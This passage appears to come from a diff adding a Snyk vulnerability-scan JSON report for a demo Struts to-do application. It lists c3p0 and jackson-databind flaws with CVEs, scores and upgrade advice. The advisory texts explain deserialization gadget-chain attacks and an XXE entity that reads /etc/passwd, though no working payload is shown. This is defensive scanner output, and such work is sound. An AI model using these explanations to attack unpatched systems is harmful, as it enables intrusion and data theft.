"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## 
Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + 
"packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, 
+ "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + 
"isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", + "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + 
"functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + 
"description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": 
[ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red 
Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. 
However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": "Deserialization of 
